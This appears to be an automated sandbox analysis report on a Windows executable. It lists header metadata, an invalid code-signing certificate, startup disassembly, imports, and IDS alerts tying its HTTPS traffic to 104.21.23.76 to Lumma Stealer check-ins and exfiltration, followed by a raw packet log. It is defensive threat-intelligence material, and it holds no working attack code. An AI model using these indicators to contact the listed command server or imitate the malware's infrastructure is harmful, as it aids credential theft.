                                                                                                                              Imagebase:0x400000
                                                                                                                              Subsystem:windows cui
                                                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_ISOLATION, TERMINAL_SERVER_AWARE
                                                                                                                              Time Stamp:0x67601EA3 [Mon Dec 16 12:35:47 2024 UTC]
                                                                                                                              TLS Callbacks:
                                                                                                                              CLR (.Net) Version:
                                                                                                                              OS Version Major:6
                                                                                                                              OS Version Minor:0
                                                                                                                              File Version Major:6
                                                                                                                              File Version Minor:0
                                                                                                                              Subsystem Version Major:6
                                                                                                                              Subsystem Version Minor:0
                                                                                                                              Import Hash:2ab4b10182ffafd3eedee95a25f64213
                                                                                                                              Signature Valid:false
                                                                                                                              Signature Issuer:CN=Sectigo Public Code Signing CA R36, O=Sectigo Limited, C=GB
                                                                                                                              Signature Validation Error:The digital signature of the object did not verify
                                                                                                                              Error Number:-2146869232
                                                                                                                              Not Before, Not After
                                                                                                                              • 30/08/2023 20:00:00 30/08/2026 19:59:59
                                                                                                                              Subject Chain
                                                                                                                              • CN=Privacy Technologies OU, O=Privacy Technologies OU, S=Harjumaa, C=EE
                                                                                                                              Version:3
                                                                                                                              Thumbprint MD5:AD1BCBF19AE2F91BB114D33B85359E56
                                                                                                                              Thumbprint SHA-1:141D90A1BA8F61863FBEDDF7DD1D66C1D1E0B128
                                                                                                                              Thumbprint SHA-256:A08EA2A7A257AD690B988446951E9DEF2986A2F3F546B6F0902805330F3B6B48
                                                                                                                              Serial:00D0461B529F67189D43744E9CEFE172AE
                                                                                                                              Instruction
                                                                                                                              call 00007F25ECB544DAh
                                                                                                                              jmp 00007F25ECB54349h
                                                                                                                              mov ecx, dword ptr [004257C0h]
                                                                                                                              push esi
                                                                                                                              push edi
                                                                                                                              mov edi, BB40E64Eh
                                                                                                                              mov esi, FFFF0000h
                                                                                                                              cmp ecx, edi
                                                                                                                              je 00007F25ECB544D6h
                                                                                                                              test esi, ecx
                                                                                                                              jne 00007F25ECB544F8h
                                                                                                                              call 00007F25ECB54501h
                                                                                                                              mov ecx, eax
                                                                                                                              cmp ecx, edi
                                                                                                                              jne 00007F25ECB544D9h
                                                                                                                              mov ecx, BB40E64Fh
                                                                                                                              jmp 00007F25ECB544E0h
                                                                                                                              test esi, ecx
                                                                                                                              jne 00007F25ECB544DCh
                                                                                                                              or eax, 00004711h
                                                                                                                              shl eax, 10h
                                                                                                                              or ecx, eax
                                                                                                                              mov dword ptr [004257C0h], ecx
                                                                                                                              not ecx
                                                                                                                              pop edi
                                                                                                                              mov dword ptr [00425800h], ecx
                                                                                                                              pop esi
                                                                                                                              ret
                                                                                                                              push ebp
                                                                                                                              mov ebp, esp
                                                                                                                              sub esp, 14h
                                                                                                                              lea eax, dword ptr [ebp-0Ch]
                                                                                                                              xorps xmm0, xmm0
                                                                                                                              push eax
                                                                                                                              movlpd qword ptr [ebp-0Ch], xmm0
                                                                                                                              call dword ptr [004239D8h]
                                                                                                                              mov eax, dword ptr [ebp-08h]
                                                                                                                              xor eax, dword ptr [ebp-0Ch]
                                                                                                                              mov dword ptr [ebp-04h], eax
                                                                                                                              call dword ptr [00423990h]
                                                                                                                              xor dword ptr [ebp-04h], eax
                                                                                                                              call dword ptr [0042398Ch]
                                                                                                                              xor dword ptr [ebp-04h], eax
                                                                                                                              lea eax, dword ptr [ebp-14h]
                                                                                                                              push eax
                                                                                                                              call dword ptr [00423A20h]
                                                                                                                              mov eax, dword ptr [ebp-10h]
                                                                                                                              lea ecx, dword ptr [ebp-04h]
                                                                                                                              xor eax, dword ptr [ebp-14h]
                                                                                                                              xor eax, dword ptr [ebp-04h]
                                                                                                                              xor eax, ecx
                                                                                                                              leave
                                                                                                                              ret
                                                                                                                              mov eax, 00004000h
                                                                                                                              ret
                                                                                                                              push 00426AA8h
                                                                                                                              call dword ptr [004239F8h]
                                                                                                                              ret
                                                                                                                              push 00030000h
                                                                                                                              push 00010000h
                                                                                                                              push 00000000h
                                                                                                                              call 00007F25ECB5948Ah
                                                                                                                              add esp, 0Ch
                                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x237980x3c.rdata
                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x2a0000xe8.rsrc
                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0xbac000x2e80.bss
                                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x2b0000x1940.reloc
                                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x1fe580x18.rdata
                                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x1cde80xc0.rdata
                                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x239280x154.rdata
                                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                              .text0x10000x1a89c0x1aa002c90bf01d6a75cfa91195eab195cb511False0.5897795627934272data6.625714555730625IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                              .rdata0x1c0000x8b240x8c00d082dcd702b8cfd5c38fc05ef266a1f7False0.3864955357142857xBase (0xa) DBF * 0, update-date 170-1-3, with index file .MDX, with memo .FPT4.662128172849137IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                              .data0x250000x226c0x1600982bdad040c9e55617b82cb91da6c951False0.39417613636363635data4.554102284484849IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                              .bsS0x280000x530x200f5c8cf64c90793e21e616701e55b6530False0.17578125data1.411880155989052IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                              .tls0x290000x90x2001f354d76203061bfdd5a53dae48d5435False0.033203125data0.020393135236084953IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                              .rsrc0x2a0000xe80x200267fca3a548bff3d326d56604fef4ee6False0.306640625data2.344915704357875IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                              .reloc0x2b0000x19400x1a00ad27a2fd39c0f74f88141246becd5b06False0.7587139423076923data6.513010283131139IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                              .bss0x2d0000x49c000x49c00aebd7a874ba7ff23b618cc323867e6a3False1.0003343485169491data7.9994076425326295IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                              .bss0x770000x49c000x49c00aebd7a874ba7ff23b618cc323867e6a3False1.0003343485169491data7.9994076425326295IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                              RT_MANIFEST0x2a0600x87XML 1.0 document, ASCII textEnglishUnited States0.8222222222222222
                                                                                                                              DLLImport
                                                                                                                              ADVAPI32.dllCryptContextAddRef
                                                                                                                              KERNEL32.dllAcquireSRWLockExclusive, CloseHandle, CompareStringW, CreateFileW, DecodePointer, DeleteCriticalSection, EncodePointer, EnterCriticalSection, EnumSystemLocalesW, ExitProcess, FindClose, FindFirstFileExW, FindNextFileW, FlushFileBuffers, FreeEnvironmentStringsW, FreeLibrary, GetACP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetConsoleMode, GetConsoleOutputCP, GetCurrentProcess, GetCurrentProcessId, GetCurrentThreadId, GetEnvironmentStringsW, GetFileSize, GetFileSizeEx, GetFileType, GetLastError, GetLocaleInfoW, GetModuleFileNameA, GetModuleFileNameW, GetModuleHandleA, GetModuleHandleExW, GetModuleHandleW, GetOEMCP, GetProcAddress, GetProcessHeap, GetStartupInfoW, GetStdHandle, GetStringTypeW, GetSystemTimeAsFileTime, GetUserDefaultLCID, HeapAlloc, HeapFree, HeapReAlloc, HeapSize, InitializeCriticalSectionAndSpinCount, InitializeCriticalSectionEx, InitializeSListHead, IsDebuggerPresent, IsProcessorFeaturePresent, IsValidCodePage, IsValidLocale, LCMapStringEx, LCMapStringW, LeaveCriticalSection, LoadLibraryExW, MultiByteToWideChar, QueryPerformanceCounter, RaiseException, ReadConsoleW, ReadFile, ReleaseSRWLockExclusive, RtlUnwind, SetEnvironmentVariableW, SetFilePointerEx, SetLastError, SetStdHandle, SetUnhandledExceptionFilter, SleepConditionVariableSRW, TerminateProcess, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, UnhandledExceptionFilter, WakeAllConditionVariable, WideCharToMultiByte, WriteConsoleW, WriteFile
                                                                                                                              Language of compilation systemCountry where language is spokenMap
                                                                                                                              EnglishUnited States
                                                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                              2024-12-18T13:49:47.532709+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.949712104.21.23.76443TCP
                                                                                                                              2024-12-18T13:49:48.399248+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.949712104.21.23.76443TCP
                                                                                                                              2024-12-18T13:49:48.399248+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.949712104.21.23.76443TCP
                                                                                                                              2024-12-18T13:49:49.654760+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.949713104.21.23.76443TCP
                                                                                                                              2024-12-18T13:49:50.616047+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.949713104.21.23.76443TCP
                                                                                                                              2024-12-18T13:49:50.616047+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.949713104.21.23.76443TCP
                                                                                                                              2024-12-18T13:49:52.808637+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.949714104.21.23.76443TCP
                                                                                                                              2024-12-18T13:49:55.191760+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.949715104.21.23.76443TCP
                                                                                                                              2024-12-18T13:49:57.766463+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.949716104.21.23.76443TCP
                                                                                                                              2024-12-18T13:50:00.723890+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.949719104.21.23.76443TCP
                                                                                                                              2024-12-18T13:50:01.494584+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.949719104.21.23.76443TCP
                                                                                                                              2024-12-18T13:50:03.335163+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.949721104.21.23.76443TCP
                                                                                                                              2024-12-18T13:50:09.275190+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.949723104.21.23.76443TCP
                                                                                                                              2024-12-18T13:50:11.969055+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.949723104.21.23.76443TCP
                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                              Dec 18, 2024 13:49:46.214553118 CET49712443192.168.2.9104.21.23.76
                                                                                                                              Dec 18, 2024 13:49:46.214577913 CET44349712104.21.23.76192.168.2.9
                                                                                                                              Dec 18, 2024 13:49:46.214641094 CET49712443192.168.2.9104.21.23.76
                                                                                                                              Dec 18, 2024 13:49:46.217725992 CET49712443192.168.2.9104.21.23.76
                                                                                                                              Dec 18, 2024 13:49:46.217734098 CET44349712104.21.23.76192.168.2.9
                                                                                                                              Dec 18, 2024 13:49:47.531558990 CET44349712104.21.23.76192.168.2.9
                                                                                                                              Dec 18, 2024 13:49:47.532708883 CET49712443192.168.2.9104.21.23.76
                                                                                                                              Dec 18, 2024 13:49:47.534358025 CET49712443192.168.2.9104.21.23.76
                                                                                                                              Dec 18, 2024 13:49:47.534363031 CET44349712104.21.23.76192.168.2.9
                                                                                                                              Dec 18, 2024 13:49:47.534604073 CET44349712104.21.23.76192.168.2.9
                                                                                                                              Dec 18, 2024 13:49:47.580930948 CET49712443192.168.2.9104.21.23.76
                                                                                                                              Dec 18, 2024 13:49:47.603797913 CET49712443192.168.2.9104.21.23.76
                                                                                                                              Dec 18, 2024 13:49:47.603827000 CET49712443192.168.2.9104.21.23.76
                                                                                                                              Dec 18, 2024 13:49:47.603936911 CET44349712104.21.23.76192.168.2.9
                                                                                                                              Dec 18, 2024 13:49:48.399286985 CET44349712104.21.23.76192.168.2.9
                                                                                                                              Dec 18, 2024 13:49:48.399380922 CET44349712104.21.23.76192.168.2.9
                                                                                                                              Dec 18, 2024 13:49:48.399439096 CET49712443192.168.2.9104.21.23.76
                                                                                                                              Dec 18, 2024 13:49:48.410841942 CET49712443192.168.2.9104.21.23.76
                                                                                                                              Dec 18, 2024 13:49:48.410841942 CET49712443192.168.2.9104.21.23.76
                                                                                                                              Dec 18, 2024 13:49:48.410860062 CET44349712104.21.23.76192.168.2.9
                                                                                                                              Dec 18, 2024 13:49:48.410870075 CET44349712104.21.23.76192.168.2.9
                                                                                                                              Dec 18, 2024 13:49:48.441617012 CET49713443192.168.2.9104.21.23.76
                                                                                                                              Dec 18, 2024 13:49:48.441677094 CET44349713104.21.23.76192.168.2.9
                                                                                                                              Dec 18, 2024 13:49:48.441765070 CET49713443192.168.2.9104.21.23.76
                                                                                                                              Dec 18, 2024 13:49:48.442090988 CET49713443192.168.2.9104.21.23.76
                                                                                                                              Dec 18, 2024 13:49:48.442111969 CET44349713104.21.23.76192.168.2.9
                                                                                                                              Dec 18, 2024 13:49:49.654694080 CET44349713104.21.23.76192.168.2.9
                                                                                                                              Dec 18, 2024 13:49:49.654759884 CET49713443192.168.2.9104.21.23.76
                                                                                                                              Dec 18, 2024 13:49:49.656315088 CET49713443192.168.2.9104.21.23.76
                                                                                                                              Dec 18, 2024 13:49:49.656325102 CET44349713104.21.23.76192.168.2.9
                                                                                                                              Dec 18, 2024 13:49:49.656604052 CET44349713104.21.23.76192.168.2.9
                                                                                                                              Dec 18, 2024 13:49:49.658006907 CET49713443192.168.2.9104.21.23.76
                                                                                                                              Dec 18, 2024 13:49:49.658035040 CET49713443192.168.2.9104.21.23.76
                                                                                                                              Dec 18, 2024 13:49:49.658087015 CET44349713104.21.23.76192.168.2.9
                                                                                                                              Dec 18, 2024 13:49:50.616048098 CET44349713104.21.23.76192.168.2.9
                                                                                                                              Dec 18, 2024 13:49:50.616777897 CET44349713104.21.23.76192.168.2.9
                                                                                                                              Dec 18, 2024 13:49:50.616848946 CET49713443192.168.2.9104.21.23.76
                                                                                                                              Dec 18, 2024 13:49:50.616889000 CET44349713104.21.23.76192.168.2.9
                                                                                                                              Dec 18, 2024 13:49:50.618204117 CET44349713104.21.23.76192.168.2.9
                                                                                                                              Dec 18, 2024 13:49:50.618247986 CET44349713104.21.23.76192.168.2.9
                                                                                                                              Dec 18, 2024 13:49:50.618258953 CET49713443192.168.2.9104.21.23.76
                                                                                                                              Dec 18, 2024 13:49:50.618268967 CET44349713104.21.23.76192.168.2.9
                                                                                                                              Dec 18, 2024 13:49:50.618956089 CET49713443192.168.2.9104.21.23.76
                                                                                                                              Dec 18, 2024 13:49:50.623804092 CET44349713104.21.23.76192.168.2.9
                                                                                                                              Dec 18, 2024 13:49:50.630660057 CET44349713104.21.23.76192.168.2.9
                                                                                                                              Dec 18, 2024 13:49:50.631480932 CET49713443192.168.2.9104.21.23.76
                                                                                                                              Dec 18, 2024 13:49:50.631511927 CET44349713104.21.23.76192.168.2.9
                                                                                                                              Dec 18, 2024 13:49:50.690218925 CET49713443192.168.2.9104.21.23.76
                                                                                                                              Dec 18, 2024 13:49:50.690253973 CET44349713104.21.23.76192.168.2.9
                                                                                                                              Dec 18, 2024 13:49:50.736021042 CET44349713104.21.23.76192.168.2.9
                                                                                                                              Dec 18, 2024 13:49:50.737104893 CET49713443192.168.2.9104.21.23.76
                                                                                                                              Dec 18, 2024 13:49:50.737131119 CET44349713104.21.23.76192.168.2.9
                                                                                                                              Dec 18, 2024 13:49:50.738528967 CET49713443192.168.2.9104.21.23.76
                                                                                                                              Dec 18, 2024 13:49:50.807897091 CET44349713104.21.23.76192.168.2.9
                                                                                                                              Dec 18, 2024 13:49:50.812021017 CET44349713104.21.23.76192.168.2.9
                                                                                                                              Dec 18, 2024 13:49:50.812129974 CET44349713104.21.23.76192.168.2.9
                                                                                                                              Dec 18, 2024 13:49:50.812216997 CET49713443192.168.2.9104.21.23.76
                                                                                                                              Dec 18, 2024 13:49:51.008712053 CET49713443192.168.2.9104.21.23.76
                                                                                                                              Dec 18, 2024 13:49:51.008712053 CET49713443192.168.2.9104.21.23.76
                                                                                                                              Dec 18, 2024 13:49:51.008760929 CET44349713104.21.23.76192.168.2.9
                                                                                                                              Dec 18, 2024 13:49:51.008775949 CET44349713104.21.23.76192.168.2.9
                                                                                                                              Dec 18, 2024 13:49:51.498528004 CET49714443192.168.2.9104.21.23.76
                                                                                                                              Dec 18, 2024 13:49:51.498573065 CET44349714104.21.23.76192.168.2.9
                                                                                                                              Dec 18, 2024 13:49:51.498646975 CET49714443192.168.2.9104.21.23.76
                                                                                                                              Dec 18, 2024 13:49:51.499134064 CET49714443192.168.2.9104.21.23.76
                                                                                                                              Dec 18, 2024 13:49:51.499146938 CET44349714104.21.23.76192.168.2.9
                                                                                                                              Dec 18, 2024 13:49:52.808445930 CET44349714104.21.23.76192.168.2.9
                                                                                                                              Dec 18, 2024 13:49:52.808636904 CET49714443192.168.2.9104.21.23.76
                                                                                                                              Dec 18, 2024 13:49:52.810141087 CET49714443192.168.2.9104.21.23.76
                                                                                                                              Dec 18, 2024 13:49:52.810158968 CET44349714104.21.23.76192.168.2.9
                                                                                                                              Dec 18, 2024 13:49:52.810415983 CET44349714104.21.23.76192.168.2.9
                                                                                                                              Dec 18, 2024 13:49:52.812040091 CET49714443192.168.2.9104.21.23.76
                                                                                                                              Dec 18, 2024 13:49:52.812189102 CET49714443192.168.2.9104.21.23.76
                                                                                                                              Dec 18, 2024 13:49:52.812216043 CET44349714104.21.23.76192.168.2.9
                                                                                                                              Dec 18, 2024 13:49:53.791563988 CET44349714104.21.23.76192.168.2.9
                                                                                                                              Dec 18, 2024 13:49:53.791663885 CET44349714104.21.23.76192.168.2.9
                                                                                                                              Dec 18, 2024 13:49:53.791722059 CET49714443192.168.2.9104.21.23.76
                                                                                                                              Dec 18, 2024 13:49:53.791802883 CET49714443192.168.2.9104.21.23.76
                                                                                                                              Dec 18, 2024 13:49:53.791822910 CET44349714104.21.23.76192.168.2.9
                                                                                                                              Dec 18, 2024 13:49:53.976594925 CET49715443192.168.2.9104.21.23.76
                                                                                                                              Dec 18, 2024 13:49:53.976650000 CET44349715104.21.23.76192.168.2.9
                                                                                                                              Dec 18, 2024 13:49:53.976727009 CET49715443192.168.2.9104.21.23.76
                                                                                                                              Dec 18, 2024 13:49:53.976986885 CET49715443192.168.2.9104.21.23.76
                                                                                                                              Dec 18, 2024 13:49:53.977003098 CET44349715104.21.23.76192.168.2.9
                                                                                                                              Dec 18, 2024 13:49:55.191628933 CET44349715104.21.23.76192.168.2.9
                                                                                                                              Dec 18, 2024 13:49:55.191760063 CET49715443192.168.2.9104.21.23.76
                                                                                                                              Dec 18, 2024 13:49:55.193073988 CET49715443192.168.2.9104.21.23.76
                                                                                                                              Dec 18, 2024 13:49:55.193085909 CET44349715104.21.23.76192.168.2.9
                                                                                                                              Dec 18, 2024 13:49:55.193324089 CET44349715104.21.23.76192.168.2.9
                                                                                                                              Dec 18, 2024 13:49:55.194474936 CET49715443192.168.2.9104.21.23.76
                                                                                                                              Dec 18, 2024 13:49:55.194603920 CET49715443192.168.2.9104.21.23.76
                                                                                                                              Dec 18, 2024 13:49:55.194639921 CET44349715104.21.23.76192.168.2.9
                                                                                                                              Dec 18, 2024 13:49:55.194709063 CET49715443192.168.2.9104.21.23.76
                                                                                                                              Dec 18, 2024 13:49:55.194715977 CET44349715104.21.23.76192.168.2.9
                                                                                                                              Dec 18, 2024 13:49:56.127691031 CET44349715104.21.23.76192.168.2.9
                                                                                                                              Dec 18, 2024 13:49:56.127780914 CET44349715104.21.23.76192.168.2.9
                                                                                                                              Dec 18, 2024 13:49:56.127840042 CET49715443192.168.2.9104.21.23.76
                                                                                                                              Dec 18, 2024 13:49:56.128249884 CET49715443192.168.2.9104.21.23.76
                                                                                                                              Dec 18, 2024 13:49:56.128268003 CET44349715104.21.23.76192.168.2.9
                                                                                                                              Dec 18, 2024 13:49:56.553641081 CET49716443192.168.2.9104.21.23.76
                                                                                                                              Dec 18, 2024 13:49:56.553745031 CET44349716104.21.23.76192.168.2.9
                                                                                                                              Dec 18, 2024 13:49:56.553854942 CET49716443192.168.2.9104.21.23.76
                                                                                                                              Dec 18, 2024 13:49:56.554155111 CET49716443192.168.2.9104.21.23.76
                                                                                                                              Dec 18, 2024 13:49:56.554198027 CET44349716104.21.23.76192.168.2.9
                                                                                                                              Dec 18, 2024 13:49:57.766297102 CET44349716104.21.23.76192.168.2.9
                                                                                                                              Dec 18, 2024 13:49:57.766463041 CET49716443192.168.2.9104.21.23.76
                                                                                                                              Dec 18, 2024 13:49:57.767750025 CET49716443192.168.2.9104.21.23.76
                                                                                                                              Dec 18, 2024 13:49:57.767766953 CET44349716104.21.23.76192.168.2.9
                                                                                                                              Dec 18, 2024 13:49:57.768062115 CET44349716104.21.23.76192.168.2.9
                                                                                                                              Dec 18, 2024 13:49:57.769494057 CET49716443192.168.2.9104.21.23.76
                                                                                                                              Dec 18, 2024 13:49:57.769646883 CET49716443192.168.2.9104.21.23.76
                                                                                                                              Dec 18, 2024 13:49:57.769680977 CET44349716104.21.23.76192.168.2.9
                                                                                                                              Dec 18, 2024 13:49:57.769895077 CET49716443192.168.2.9104.21.23.76
                                                                                                                              Dec 18, 2024 13:49:57.769908905 CET44349716104.21.23.76192.168.2.9
                                                                                                                              Dec 18, 2024 13:49:58.655837059 CET44349716104.21.23.76192.168.2.9
                                                                                                                              Dec 18, 2024 13:49:58.655932903 CET44349716104.21.23.76192.168.2.9
                                                                                                                              Dec 18, 2024 13:49:58.656097889 CET49716443192.168.2.9104.21.23.76
                                                                                                                              Dec 18, 2024 13:49:58.675328016 CET49716443192.168.2.9104.21.23.76
                                                                                                                              Dec 18, 2024 13:49:58.675379992 CET44349716104.21.23.76192.168.2.9
                                                                                                                              Dec 18, 2024 13:49:59.501483917 CET49719443192.168.2.9104.21.23.76
                                                                                                                              Dec 18, 2024 13:49:59.501533031 CET44349719104.21.23.76192.168.2.9
                                                                                                                              Dec 18, 2024 13:49:59.501617908 CET49719443192.168.2.9104.21.23.76
                                                                                                                              Dec 18, 2024 13:49:59.501935005 CET49719443192.168.2.9104.21.23.76
                                                                                                                              Dec 18, 2024 13:49:59.501944065 CET44349719104.21.23.76192.168.2.9
                                                                                                                              Dec 18, 2024 13:50:00.723746061 CET44349719104.21.23.76192.168.2.9
                                                                                                                              Dec 18, 2024 13:50:00.723890066 CET49719443192.168.2.9104.21.23.76
                                                                                                                              Dec 18, 2024 13:50:00.725153923 CET49719443192.168.2.9104.21.23.76
                                                                                                                              Dec 18, 2024 13:50:00.725171089 CET44349719104.21.23.76192.168.2.9
                                                                                                                              Dec 18, 2024 13:50:00.725460052 CET44349719104.21.23.76192.168.2.9
                                                                                                                              Dec 18, 2024 13:50:00.737047911 CET49719443192.168.2.9104.21.23.76
                                                                                                                              Dec 18, 2024 13:50:00.737461090 CET49719443192.168.2.9104.21.23.76
                                                                                                                              Dec 18, 2024 13:50:00.737467051 CET44349719104.21.23.76192.168.2.9
                                                                                                                              Dec 18, 2024 13:50:01.494590998 CET44349719104.21.23.76192.168.2.9
                                                                                                                              Dec 18, 2024 13:50:01.494674921 CET44349719104.21.23.76192.168.2.9
                                                                                                                              Dec 18, 2024 13:50:01.494772911 CET49719443192.168.2.9104.21.23.76
                                                                                                                              Dec 18, 2024 13:50:01.526451111 CET49719443192.168.2.9104.21.23.76
                                                                                                                              Dec 18, 2024 13:50:01.526465893 CET44349719104.21.23.76192.168.2.9
                                                                                                                              Dec 18, 2024 13:50:02.116883039 CET49721443192.168.2.9104.21.23.76
                                                                                                                              Dec 18, 2024 13:50:02.116910934 CET44349721104.21.23.76192.168.2.9
                                                                                                                              Dec 18, 2024 13:50:02.117016077 CET49721443192.168.2.9104.21.23.76
                                                                                                                              Dec 18, 2024 13:50:02.117382050 CET49721443192.168.2.9104.21.23.76
                                                                                                                              Dec 18, 2024 13:50:02.117399931 CET44349721104.21.23.76192.168.2.9
                                                                                                                              Dec 18, 2024 13:50:03.335074902 CET44349721104.21.23.76192.168.2.9
                                                                                                                              Dec 18, 2024 13:50:03.335163116 CET49721443192.168.2.9104.21.23.76
                                                                                                                              Dec 18, 2024 13:50:03.336707115 CET49721443192.168.2.9104.21.23.76
                                                                                                                              Dec 18, 2024 13:50:03.336713076 CET44349721104.21.23.76192.168.2.9
                                                                                                                              Dec 18, 2024 13:50:03.336996078 CET44349721104.21.23.76192.168.2.9
                                                                                                                              Dec 18, 2024 13:50:03.348099947 CET49721443192.168.2.9104.21.23.76
                                                                                                                              Dec 18, 2024 13:50:03.348859072 CET49721443192.168.2.9104.21.23.76
                                                                                                                              Dec 18, 2024 13:50:03.348896027 CET44349721104.21.23.76192.168.2.9
                                                                                                                              Dec 18, 2024 13:50:03.349704027 CET49721443192.168.2.9104.21.23.76
                                                                                                                              Dec 18, 2024 13:50:03.349740028 CET44349721104.21.23.76192.168.2.9
                                                                                                                              Dec 18, 2024 13:50:03.349849939 CET49721443192.168.2.9104.21.23.76
                                                                                                                              Dec 18, 2024 13:50:03.349886894 CET44349721104.21.23.76192.168.2.9
                                                                                                                              Dec 18, 2024 13:50:03.350032091 CET49721443192.168.2.9104.21.23.76
                                                                                                                              Dec 18, 2024 13:50:03.350045919 CET44349721104.21.23.76192.168.2.9
                                                                                                                              Dec 18, 2024 13:50:03.350194931 CET49721443192.168.2.9104.21.23.76
                                                                                                                              Dec 18, 2024 13:50:03.350208998 CET44349721104.21.23.76192.168.2.9
                                                                                                                              Dec 18, 2024 13:50:03.350358963 CET49721443192.168.2.9104.21.23.76
                                                                                                                              Dec 18, 2024 13:50:03.350383997 CET44349721104.21.23.76192.168.2.9
                                                                                                                              Dec 18, 2024 13:50:03.350394011 CET49721443192.168.2.9104.21.23.76
                                                                                                                              Dec 18, 2024 13:50:03.350538969 CET49721443192.168.2.9104.21.23.76
                                                                                                                              Dec 18, 2024 13:50:03.350568056 CET49721443192.168.2.9104.21.23.76
                                                                                                                              Dec 18, 2024 13:50:03.395342112 CET44349721104.21.23.76192.168.2.9
                                                                                                                              Dec 18, 2024 13:50:03.395560980 CET49721443192.168.2.9104.21.23.76
                                                                                                                              Dec 18, 2024 13:50:03.395598888 CET49721443192.168.2.9104.21.23.76
                                                                                                                              Dec 18, 2024 13:50:03.395606995 CET49721443192.168.2.9104.21.23.76
                                                                                                                              Dec 18, 2024 13:50:03.443336964 CET44349721104.21.23.76192.168.2.9
                                                                                                                              Dec 18, 2024 13:50:03.443536043 CET49721443192.168.2.9104.21.23.76
                                                                                                                              Dec 18, 2024 13:50:03.443582058 CET49721443192.168.2.9104.21.23.76
                                                                                                                              Dec 18, 2024 13:50:03.443605900 CET49721443192.168.2.9104.21.23.76
                                                                                                                              Dec 18, 2024 13:50:03.491333961 CET44349721104.21.23.76192.168.2.9
                                                                                                                              Dec 18, 2024 13:50:03.491540909 CET49721443192.168.2.9104.21.23.76
                                                                                                                              Dec 18, 2024 13:50:03.535327911 CET44349721104.21.23.76192.168.2.9
                                                                                                                              Dec 18, 2024 13:50:03.591237068 CET44349721104.21.23.76192.168.2.9
                                                                                                                              Dec 18, 2024 13:50:07.924148083 CET44349721104.21.23.76192.168.2.9
                                                                                                                              Dec 18, 2024 13:50:07.924276114 CET44349721104.21.23.76192.168.2.9
                                                                                                                              Dec 18, 2024 13:50:07.924334049 CET49721443192.168.2.9104.21.23.76
                                                                                                                              Dec 18, 2024 13:50:07.924829006 CET49721443192.168.2.9104.21.23.76
                                                                                                                              Dec 18, 2024 13:50:07.924851894 CET44349721104.21.23.76192.168.2.9
                                                                                                                              Dec 18, 2024 13:50:07.956264019 CET49723443192.168.2.9104.21.23.76
                                                                                                                              Dec 18, 2024 13:50:07.956327915 CET44349723104.21.23.76192.168.2.9
                                                                                                                              Dec 18, 2024 13:50:07.956413031 CET49723443192.168.2.9104.21.23.76
                                                                                                                              Dec 18, 2024 13:50:07.956738949 CET49723443192.168.2.9104.21.23.76
                                                                                                                              Dec 18, 2024 13:50:07.956759930 CET44349723104.21.23.76192.168.2.9
